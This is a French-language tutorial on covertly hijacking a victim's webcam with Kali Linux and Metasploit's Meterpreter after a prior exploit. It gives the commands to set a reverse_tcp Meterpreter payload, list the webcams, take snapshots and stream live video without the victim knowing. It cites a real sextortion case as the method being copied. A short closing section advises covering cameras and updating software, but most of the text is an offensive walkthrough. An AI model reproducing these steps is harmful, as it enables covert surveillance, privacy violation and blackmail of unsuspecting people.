Dans ce tutoriel, nous allons voir comment pirater une webcam secrètement et à distance sur Internet et jeter un coup d’œil à ce qui se passe de l’autre côté. Nous utiliserons le puissant Meterpreter et Kali Linux pour pirater la webcam de la victime. Nous prendrons le contrôle total de la webcam, l’allumerons, obtiendrons des instantanés et diffuserons même des vidéos en direct sans que personne ne le sache.
Au début de 2014, un hacker a été condamné à 18 mois pour avoir fait cela à Miss Teen USA 2013. Il a trouvé une vulnérabilité dans son ordinateur (comme un logiciel obsolète), a pris quelques photos compromettantes de la webcam et a fait chanter la victime pour envoyer plus de photos. La méthode qu’il a utilisée est exactement ce que nous allons essayer ici.
Notre meilleur ami meterpreter va nous aider avec ce hack. Avec Meterpreter, nous pouvons contrôler la webcam de quelqu’un, installer un enregistreur de frappe ou planter vos propres virus, voler des données privées et faire à peu près n’importe quoi sur l’ordinateur de la victime.
Pour ce tutoriel, je suppose que vous avez déjà utilisé un module d’attaque pour exploiter une vulnérabilité à l’aide de Metasploit (Comment faire?). Passons maintenant à ça.
Comment pirater des webcams ?
Étape 1: Configurez meterpreter.
Une fois que nous avons réussi à exploiter la victime, nous avons maintenant la possibilité de définir une charge utile de notre choix. La charge utile indique à metasploit ce qu’il faut faire sur l’ordinateur de la victime une fois qu’il entre. Meterpreter est notre charge utile. La commande suivante configure notre charge utile:
set payload windows/meterpreter/reverse_tcpSi l’attaque a réussi, metasploit installe automatiquement meterpreter sur le système cible et nous pouvons passer au piratage de la webcam.
Étape 2: Trouvez la webcam.
Meterpreter dispose d’un module intégré pour rechercher et contrôler la webcam du système distant. Nous pouvons commencer par rechercher si le système a même une webcam ou not.me . La commande ci-dessous est utilisée pour cela, elle nous renvoie également le nom de la webcam.
meterpreter > webcam_listEt maintenant vous devriez voir la ou les webcam(s) de votre cible répertoriées dans la sortie.
Étape 3: Prenez des instantanés
Si la dernière commande nous a donné une webcam, nous pouvons aller de l’avant et prendre une photo:
meterpreter > webcam_snapEt maintenant vous devriez voir qu’une image a été enregistrée dans le dossier /opt/framework3/msf3Dirigez-vous simplement là-bas
Étape 4: Diffusez des vidéos en temps réel à partir de la webcam piratée
Nous venons donc de prendre une photo, voyons comment obtenir un flux vidéo en direct. Nous pouvons le faire en tapant la commande ci-dessous: (Nous utilisons le paramètre –p pour spécifier le répertoire que nous voulons donner au fichier de streaming vidéo)
meterpreter > run webcam -p /var/wwwCette commande déclenche la webcam de la victime et envoie sa sortie vidéo à /var/www/webcam.htm. Vous pouvez ouvrir ce fichier et vérifier ce qui se passe à l’autre extrémité dans un flux vidéo en direct.
Comment empêcher le piratage de votre propre webcam ?
Il existe plusieurs façons de pirater des webcams. Dans l’exemple ci-dessus, avec seulement quelques petites commandes, nous pouvons jeter un coup d’œil à la webcam de notre victime. Tout expert en sécurité chevronné vous dira qu’aucun système n’est complètement sécurisé. C’est pourquoi vous devez toujours garder vos caméras couvertes lorsqu’elles ne sont pas utilisées. Personnellement, j’utilise ce petit gadget sur mon ordinateur portable et mon smartphone.
Mais cela ne signifie pas que vous ne devriez pas prendre la peine de garder votre système d’exploitation et vos applications à jour, bien au contraire en fait. Si un pirate peut prendre le contrôle de votre webcam, votre système a été exploité avec succès, il s’agit effectivement désormais d’un bot, esclave de l’attaquant. Cela signifie que l’attaquant peut tout faire sur votre système: accéder à vos données privées, voir tout ce que vous tapez ainsi que tous les sites Web que vous visitez.
Quel appareil utilisez-vous en ce moment? Un smartphone ? Un ordinateur portable ? Il y a de fortes chances que vous fixiez directement une caméra. Vous sentez-vous soudainement un peu mal à l’aise? Tu devrais. Ne prenez aucun risque. Si vous couvrez simplement vos caméras et mettez à jour régulièrement tous vos logiciels, vous pouvez éviter d’être vous-même victime d’un piratage de webcam.